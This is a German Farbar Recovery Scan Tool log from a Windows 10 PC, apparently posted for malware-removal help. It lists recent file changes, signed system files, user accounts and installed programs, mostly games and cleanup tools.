2016-02-27 21:57 - 2016-02-27 22:08 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-02-27 21:57 - 2016-02-27 21:57 - 00001178 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2016-02-27 21:57 - 2016-02-27 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2016-02-27 21:57 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-02-27 21:57 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-02-27 21:57 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-02-27 21:51 - 2016-02-27 21:57 - 22908888 _____ (Malwarebytes ) C:\Users\Hanns\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-27 21:45 - 2016-02-27 21:47 - 00000000 ____D C:\AdwCleaner
2016-02-27 21:44 - 2016-02-27 21:45 - 01511936 _____ C:\Users\Hanns\Downloads\AdwCleaner_5.036.exe
2016-02-27 21:41 - 2016-02-27 21:41 - 00001344 _____ C:\Users\Hanns\Desktop\Revo Uninstaller.lnk
2016-02-27 21:41 - 2016-02-27 21:41 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-27 21:41 - 2016-02-27 21:41 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-02-27 21:40 - 2016-02-27 21:40 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Hanns\Downloads\revosetup95.exe
2016-02-27 20:08 - 2016-02-27 22:14 - 00048002 _____ C:\Users\Hanns\Downloads\Addition.txt
2016-02-27 20:07 - 2016-02-28 07:40 - 00011690 _____ C:\Users\Hanns\Downloads\FRST.txt
2016-02-27 20:07 - 2016-02-28 07:40 - 00000000 ____D C:\FRST
2016-02-27 20:05 - 2016-02-27 20:07 - 02371072 _____ (Farbar) C:\Users\Hanns\Downloads\FRST64.exe
2016-02-27 18:18 - 2016-02-27 21:57 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2016-02-27 18:18 - 2016-02-27 18:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-17 07:28 - 2016-02-17 07:30 - 00000000 ____D C:\Users\Hanns\Documents\SEGA Mega Drive Classics
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Jet Set Radio.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000222 _____ C:\Users\Hanns\Desktop\Hell Yeah!.url
2016-02-17 07:25 - 2016-02-17 07:25 - 00000221 _____ C:\Users\Hanns\Desktop\SEGA Genesis & Mega Drive Classics.url
2016-02-13 17:02 - 2016-02-13 17:02 - 00000010 _____ C:\Users\Hanns\Desktop\hng.txt
2016-02-12 13:36 - 2016-02-24 20:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-11 02:23 - 2016-02-11 02:23 - 00000222 _____ C:\Users\Hanns\Desktop\Rocket League.url
2016-02-11 00:20 - 2016-02-11 00:20 - 00000222 _____ C:\Users\Hanns\Desktop\TowerFall Ascension.url
2016-02-10 23:22 - 2016-02-10 23:22 - 00000222 _____ C:\Users\Hanns\Desktop\Mount Your Friends.url
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Windows\SysWOW64\AGEIA
2016-02-10 19:53 - 2016-02-10 19:53 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
2016-02-10 16:33 - 2016-02-10 16:34 - 69212943 _____ C:\Users\Hanns\Downloads\KHB70O.zip
2016-02-10 14:20 - 2013-01-26 15:30 - 00000000 ____D C:\Users\Hanns\Downloads\Bg Br Hld Be Hrd mpt
2016-02-10 13:28 - 2016-02-10 14:21 - 00000000 ____D C:\Users\Hanns\Downloads\Mick Grabham-1972 - Mick The Lad
2016-02-10 13:26 - 2016-02-10 13:27 - 00000000 ____D C:\Users\Hanns\Downloads\manassas
2016-02-09 19:40 - 2016-01-29 07:57 - 04502352 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-02-09 19:40 - 2016-01-29 07:33 - 04064320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-02-09 19:40 - 2016-01-27 07:15 - 01557776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:15 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 07476064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 19:40 - 2016-01-27 07:01 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 19:40 - 2016-01-27 07:01 - 01819720 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 19:40 - 2016-01-27 06:59 - 00304752 _____ (Microsoft Corporation) C:\Windows\system32\systemreset.exe
2016-02-09 19:40 - 2016-01-27 06:57 - 02919320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 19:40 - 2016-01-27 06:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:56 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:55 - 00081112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:54 - 00295264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 19:40 - 2016-01-27 06:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-02-09 19:40 - 2016-01-27 06:45 - 06605544 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-02-09 19:40 - 2016-01-27 06:44 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-02-09 19:40 - 2016-01-27 06:44 - 00085320 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2016-02-09 19:40 - 2016-01-27 06:43 - 00359776 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-02-09 19:40 - 2016-01-27 06:37 - 01998176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-02-09 19:40 - 2016-01-27 06:37 - 00576352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-02-09 19:40 - 2016-01-27 06:21 - 00162816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 19:40 - 2016-01-27 06:15 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:13 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:12 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:11 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 22394368 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:10 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00299008 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 19:40 - 2016-01-27 06:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-02-09 19:40 - 2016-01-27 06:07 - 00203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassam.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 19339776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 18678272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-02-09 19:40 - 2016-01-27 06:05 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 09918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-02-09 19:40 - 2016-01-27 06:04 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 19:40 - 2016-01-27 06:03 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-02-09 19:40 - 2016-01-27 06:02 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 19:40 - 2016-01-27 06:01 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:59 - 00258048 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2016-02-09 19:40 - 2016-01-27 05:58 - 11545088 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-02-09 19:40 - 2016-01-27 05:57 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 12125696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:55 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:54 - 24603136 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 19:40 - 2016-01-27 05:52 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 02230784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 01504768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:50 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 19:40 - 2016-01-27 05:49 - 05662208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:48 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 19:40 - 2016-01-27 05:44 - 00063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 19:40 - 2016-01-27 05:42 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-02-09 19:40 - 2016-01-27 05:41 - 03592704 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-02-09 19:40 - 2016-01-27 05:39 - 02275328 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 07835648 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-02-09 19:40 - 2016-01-27 05:38 - 01734656 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-02-09 19:40 - 2016-01-27 05:37 - 04894720 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 19:40 - 2016-01-27 05:36 - 02757120 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 19:40 - 2016-01-27 05:32 - 01087488 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2016-02-09 19:40 - 2016-01-27 05:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 00:33 - 2016-02-09 00:33 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\fltk.org
2016-02-09 00:32 - 2016-02-09 00:44 - 00000000 ____D C:\Users\Hanns\Downloads\psx
2016-02-08 20:24 - 2016-02-08 20:25 - 00000000 ____D C:\Users\Hanns\Documents\lame enc
2016-02-08 20:19 - 2016-02-08 22:00 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\AccurateRip
2016-02-08 20:19 - 2016-02-08 20:19 - 00001146 _____ C:\Users\Public\Desktop\Exact Audio Copy.lnk
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\EAC
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exact Audio Copy
2016-02-08 20:19 - 2016-02-08 20:19 - 00000000 ____D C:\Program Files (x86)\Exact Audio Copy
2016-02-08 20:18 - 2016-02-08 20:18 - 01466656 _____ C:\Users\Hanns\Downloads\Exact Audio Copy - CHIP-Installer.exe
2016-02-06 13:14 - 2016-02-06 13:15 - 00000000 ____D C:\Users\Hanns\Documents\Rayman Legends
2016-02-06 13:11 - 2016-02-06 13:12 - 66007832 _____ (Ubisoft) C:\Users\Hanns\Downloads\UplayInstaller.exe
2016-02-06 08:40 - 2016-02-06 08:40 - 00000222 _____ C:\Users\Hanns\Desktop\Rayman Legends.url
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2016-02-06 01:26 - 2016-02-06 01:26 - 00000000 ____D C:\Program Files (x86)\GameSpy Arcade
2016-02-05 22:08 - 2016-02-05 22:08 - 00000222 _____ C:\Users\Hanns\Desktop\SOMA.url
2016-02-05 22:08 - 2016-02-05 22:08 - 00000221 _____ C:\Users\Hanns\Desktop\Painkiller Black Edition.url
2016-02-05 20:29 - 2016-02-06 13:12 - 00001281 _____ C:\Users\Hanns\Desktop\Uplay.lnk
2016-02-05 20:29 - 2016-02-05 20:29 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2016-02-05 20:28 - 2016-02-06 13:20 - 00000000 ____D C:\Users\Hanns\AppData\Local\Ubisoft Game Launcher
2016-02-05 20:28 - 2016-02-05 20:28 - 00000000 ____D C:\Program Files (x86)\Ubisoft
2016-02-04 15:37 - 2016-02-05 12:43 - 00000000 ____D C:\Users\Hanns\Documents\Witcher 2
2016-02-04 15:37 - 2016-02-04 15:37 - 00000000 ____D C:\Users\Hanns\AppData\Local\The Witcher 2
2016-02-03 22:33 - 2016-02-03 22:33 - 00000000 ____D C:\Users\Hanns\AppData\Local\nuclearthrone
2016-02-03 21:57 - 2016-02-03 22:27 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Bioshock
2016-02-03 21:57 - 2016-02-03 22:22 - 00000000 ____D C:\Users\Hanns\Documents\Bioshock
2016-02-02 23:59 - 2016-02-02 23:59 - 00000221 _____ C:\Users\Hanns\Desktop\The Witcher 2 Assassins of Kings Enhanced Edition.url
2016-02-02 23:56 - 2016-02-02 23:56 - 00000222 _____ C:\Users\Hanns\Desktop\Viscera Cleanup Detail Shadow Warrior.url
2016-02-02 09:51 - 2016-02-02 09:52 - 00000000 ____D C:\Users\Hanns\Documents\Hard Reset Extended
2016-02-02 08:51 - 2016-02-02 08:51 - 00000221 _____ C:\Users\Hanns\Desktop\Hard Reset.url
2016-02-01 21:50 - 2016-02-01 21:51 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior
2016-02-01 08:06 - 2016-02-27 19:06 - 00000000 ____D C:\Users\Hanns\Downloads\programme
2016-02-01 07:56 - 2016-02-10 23:01 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-01 07:56 - 2016-02-10 23:01 - 00002259 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-01 07:55 - 2016-02-28 07:38 - 00001136 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-01 07:55 - 2016-02-27 23:00 - 00001140 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-01 07:55 - 2016-02-01 12:48 - 00000000 ____D C:\Users\Hanns\AppData\Local\Google
2016-02-01 07:55 - 2016-02-01 07:56 - 00000000 ____D C:\Program Files (x86)\Google
2016-02-01 07:55 - 2016-02-01 07:55 - 00004198 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-01 07:55 - 2016-02-01 07:55 - 00003966 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-31 22:12 - 2016-01-31 22:13 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior DX11
2016-01-31 19:33 - 2016-01-31 19:33 - 00000222 _____ C:\Users\Hanns\Desktop\Shadow Warrior.url
2016-01-31 16:22 - 2016-01-31 16:22 - 00001125 _____ C:\Users\Hanns\Desktop\Project64.exe - Verknüpfung.lnk
2016-01-31 15:41 - 2016-01-31 16:01 - 00000000 ____D C:\Program Files (x86)\Project64 1.6
2016-01-31 15:41 - 2016-01-31 15:41 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\project64 1.6
2016-01-30 23:28 - 2016-01-30 23:28 - 00000222 _____ C:\Users\Hanns\Desktop\Street Fighter V Beta.url
2016-01-30 22:15 - 2016-01-30 22:16 - 00000000 ____D C:\Users\Hanns\Documents\Shadow Warrior Demo

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-28 07:38 - 2015-12-16 21:34 - 00000000 ____D C:\Program Files (x86)\Steam
2016-02-28 07:38 - 2015-12-16 20:39 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-02-28 07:37 - 2015-12-21 22:42 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-28 07:37 - 2015-11-05 21:07 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-28 07:36 - 2015-10-30 07:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-02-28 07:35 - 2016-01-12 18:55 - 00000000 ____D C:\Users\Hanns\AppData\LocalLow\Temp
2016-02-27 22:55 - 2015-12-31 12:07 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-02-27 22:06 - 2015-10-30 08:21 - 00000000 ____D C:\Windows\INF
2016-02-27 20:02 - 2015-11-05 21:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-27 19:23 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:07 - 2015-12-16 20:40 - 00000000 ____D C:\Users\Hanns
2016-02-27 18:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\registration
2016-02-27 14:09 - 2015-12-18 21:35 - 00000000 ____D C:\Users\Hanns\AppData\Local\CrashDumps
2016-02-27 12:03 - 2015-12-24 14:58 - 00000000 ____D C:\Users\Hanns\AppData\Local\Spotify
2016-02-24 20:13 - 2015-12-16 21:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-19 00:25 - 2015-12-23 08:32 - 00000000 ___RD C:\Users\Hanns\Desktop\Podcast
2016-02-17 07:49 - 2015-12-18 22:04 - 00000000 ____D C:\Users\Hanns\Documents\SavedGames
2016-02-17 07:25 - 2015-12-16 21:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-02-14 15:39 - 2015-12-24 14:57 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\Spotify
2016-02-13 18:46 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\vlc
2016-02-13 18:19 - 2016-01-22 09:55 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\MusicBee
2016-02-12 05:38 - 2015-11-05 21:11 - 01802588 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-12 05:38 - 2015-11-05 20:38 - 00776562 _____ C:\Windows\system32\perfh007.dat
2016-02-12 05:38 - 2015-11-05 20:38 - 00155874 _____ C:\Windows\system32\perfc007.dat
2016-02-11 22:59 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\rescache
2016-02-11 19:27 - 2015-12-16 20:43 - 00002390 _____ C:\Users\Hanns\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-11 19:27 - 2015-12-16 20:43 - 00000000 ___RD C:\Users\Hanns\OneDrive
2016-02-11 12:11 - 2015-11-05 21:07 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-11 06:25 - 2015-10-30 10:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 03:00 - 2015-12-21 23:36 - 00000000 ____D C:\Users\Hanns\Documents\My Games
2016-02-10 19:53 - 2015-12-21 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-02-09 23:50 - 2015-12-16 20:59 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 23:47 - 2015-12-16 20:59 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-09 23:47 - 2015-10-30 08:11 - 00000000 ____D C:\Windows\CbsTemp
2016-02-09 08:29 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\LiveKernelReports
2016-02-06 21:32 - 2016-01-08 18:05 - 00000000 ____D C:\Users\Hanns\AppData\Roaming\dvdcss
2016-02-04 00:29 - 2016-01-01 18:41 - 00001515 _____ C:\Users\Hanns\Desktop\RealTemp - Verknüpfung.lnk
2016-02-03 20:01 - 2015-10-30 08:26 - 00828920 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-02-03 20:01 - 2015-10-30 08:26 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 15:43 - 2015-12-16 20:41 - 00000000 ____D C:\Users\Hanns\AppData\Local\VirtualStore
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___SD C:\Windows\system32\F12
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\oobe
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-29 03:30 - 2015-10-30 08:24 - 00000000 ____D C:\Windows\bcastdvr

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-12-10 13:26 - 2015-12-10 13:26 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-24 20:26

==================== Ende von FRST.txt ============================
         

Addition.txt
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-02-2016
durchgeführt von Hanns (2016-02-28 07:41:11)
Gestartet von C:\Users\Hanns\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-16 19:39:02)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-15253450-2137153623-3730132983-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-15253450-2137153623-3730132983-503 - Limited - Disabled)
Gast (S-1-5-21-15253450-2137153623-3730132983-501 - Limited - Disabled)
Hanns (S-1-5-21-15253450-2137153623-3730132983-1001 - Administrator - Enabled) => C:\Users\Hanns

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Alien: Isolation (HKLM-x32\...\Steam App 214490) (Version:  - Creative Assembly)
Astebreed (HKLM-x32\...\Steam App 283680) (Version:  - Edelweiss)
BioShock (HKLM-x32\...\Steam App 7670) (Version:  - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version:  - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Brütal Legend (HKLM-x32\...\Steam App 225260) (Version:  - Double Fine Productions)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version:  - Torn Banner Studios)
CPUID CPU-Z MSI 1.74 (HKLM\...\CPUID CPU-Z MSI_is1) (Version: 1.74 - CPUID, Inc.)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
DARK SOULS™ II: Scholar of the First Sin (HKLM-x32\...\Steam App 335300) (Version:  - FromSoftware, Inc)
Darkest Dungeon (HKLM-x32\...\Steam App 262060) (Version:  - Red Hook Studios)
Darksiders (HKLM-x32\...\Steam App 50620) (Version:  - Vigil Games)
DarksidersInstaller (HKLM-x32\...\{B93EEE50-9C8F-45DF-95E4-3D85A6E242F3}) (Version: 1.00.1000 - Ihr Firmenname)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Don't Starve (HKLM-x32\...\Steam App 219740) (Version:  - Klei Entertainment)
Dragon's Dogma: Dark Arisen (HKLM-x32\...\Steam App 367500) (Version:  - Capcom)
Exact Audio Copy 1.1 (HKLM-x32\...\Exact Audio Copy) (Version: 1.1 - Andre Wiethoff)
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Guacamelee! Super Turbo Championship Edition (HKLM-x32\...\Steam App 275390) (Version:  - DrinkBox Studios)
Hard Reset (HKLM-x32\...\Steam App 98400) (Version:  - Flying Wild Hog)
Hell Yeah! (HKLM-x32\...\Steam App 205230) (Version:  - Arkedo)
Ikaruga (HKLM-x32\...\Steam App 253750) (Version:  - Treasure)
Intel(R) Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4279 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Jet Set Radio (HKLM-x32\...\Steam App 205950) (Version:  - Blit Software)
Legend of Grimrock (HKLM-x32\...\Steam App 207170) (Version:  - Almost Human Games)
LEGO® Star Wars™: The Complete Saga (HKLM-x32\...\Steam App 32440) (Version:  - Traveller's Tales)
Machinarium (HKLM-x32\...\Steam App 40700) (Version:  - Amanita Design)
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mark of the Ninja (HKLM-x32\...\Steam App 214560) (Version:  - Klei Entertainment)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
